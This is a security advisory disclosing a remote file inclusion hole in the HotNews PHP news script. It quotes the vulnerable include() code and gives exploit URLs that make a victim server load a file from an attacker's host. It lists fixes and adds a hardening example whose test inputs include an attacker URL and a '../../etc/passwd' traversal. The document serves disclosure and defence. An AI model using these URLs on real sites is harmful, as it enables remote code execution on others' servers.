
HotNews arbitrary file inclusion




===+++===+++===+++
Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr@xxxxxxxxxxxxxx>
Vendor Response: Not contacted yet.
===+++===+++===+++


Problem #1:
===+++===+++===+++
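An attacker can include any file from a remote or local
server. Both scripts below pass $config[...] values to include()
without setting them first, so when global variables are enabled and
a script is requested directly, those values can be supplied in the URL.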


PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
  include($config["header"]);
}
[...]


PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
  include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]

Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
etc...


Fix #1:
===+++===+++===+++
Turn off global variables (register_globals = Off in php.ini).

Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.


-- 
Regards,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
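
Added example (not part of the original advisory and not HotNews code): a code-level complement to Fix #1 and Fix #2, showing include paths built from a directory fixed in code and a db_type checked against an allow-list, so neither $config["incdir"] nor $config["db_type"] can steer include(). The names HN_INCDIR, hn_safe_path, hn_db_driver and the driver list are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example, not HotNews code. HN_INCDIR and the driver list are assumptions.
define('HN_INCDIR', __DIR__ . DIRECTORY_SEPARATOR);   // fixed in code, never taken from the request
$HN_DB_DRIVERS = array('mysql', 'pgsql');              // hypothetical allow-list of db_type values

// Resolve $file under HN_INCDIR; return the real path, or false if it is a URL,
// escapes the directory, or does not exist.
function hn_safe_path($file)
{
    // Reject URL wrappers (http://, ftp://, php://, ...) and NUL bytes outright.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $file) || strpos($file, "\0") !== false) {
        return false;
    }
    $real = realpath(HN_INCDIR . $file);               // collapses ../ and follows symlinks
    $base = realpath(HN_INCDIR);
    if ($real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                                  // missing, or outside the include directory
    }
    return $real;
}

// Map a configured db_type to its driver file name, or false if it is not on the allow-list.
function hn_db_driver($db_type, $allowed)
{
    return in_array($db_type, $allowed, true) ? 'db.' . $db_type . '.inc.php3' : false;
}

// Constructed inputs: a file that exists in HN_INCDIR (this script), a remote URL in
// the shape the advisory describes (placeholder host), and a directory traversal.
$samples = array(basename(__FILE__), 'http://attacker.example/func.inc.php3', '../../etc/passwd');
foreach ($samples as $s) {
    printf("%-45s %s\n", $s, hn_safe_path($s) === false ? 'rejected' : 'allowed');
}

// db_type values: one on the allow-list, one attempting to break out of the file name.
foreach (array('mysql', 'x/../../y') as $t) {
    $driver = hn_db_driver($t, $HN_DB_DRIVERS);
    printf("%-45s %s\n", "db_type=$t", $driver === false ? 'rejected' : $driver);
}
```

An include file hardened this way would call include(hn_safe_path(...)) only after checking that the result is not false.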